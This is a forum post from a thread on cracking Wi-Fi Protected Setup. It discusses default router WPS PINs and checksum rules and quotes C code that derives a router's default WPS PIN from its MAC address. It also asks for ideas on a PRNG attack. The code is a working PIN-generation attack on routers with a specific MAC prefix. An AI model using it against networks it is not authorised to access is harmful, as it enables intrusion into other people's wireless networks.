Originally Posted by
wiire
You may be right but of course, vendors do what they want... we know. I saw PINs that didn't match the checksum too. I'll add the checksum optimization soon.
I just know one case of a router model that has a default PIN that doesn't respect the checksum rule , it was used by telefonica (spanish ISP) and it is the "Amper" ASL-26555
otherwise i always saw default PIN that respect the checksum rules
for the checksum if you need any help i can explain you every step in details.
this is the ZaoChunsheng C code called ComputePIN and at the end you can see the function he uses to generate the checksum with a while loop
Code:
#include <stdio.h>
#include <stdlib.h></code>
int main()
{
unsigned int wps_pin_checksum(unsigned int pin);
int PIN = 0;
printf("ComputePIN-C83A35\n");
printf("Description:\n");
printf("If your wireless router MAC address start with \"C83A35\",\n");
printf("type the other six digits, you might be able to get the \n");
printf("WPS-PIN of this equipment, please have a try, good luck!\n\n");
printf("Code by ZhaoChunsheng 04/07/2012 http://iBeini.com\n\n");
printf("Input MAC Address(HEX):c83a35");
scanf("%x",&PIN);
printf("MAC Address(HEX) is: C83A35%X\n",PIN);
printf("WPS PIN is: %07d%d\n",PIN%10000000,wps_pin_checksum(PIN%10000000));
return 0;
}
unsigned int wps_pin_checksum(unsigned int pin)
{
unsigned int accum = 0;
while (pin)
{
accum += 3 * (pin % 10);
pin /= 10;
accum += pin % 10;
pin /= 10;
}
return (10 - accum % 10) % 10;
}
If someone has information or suggestions on the PNRG attack, please share.
This PDF is VERY interesting : it is realiy focused on brute force issues vs Diffie-Hellman
Exploring Diffie-Hellman Encryption
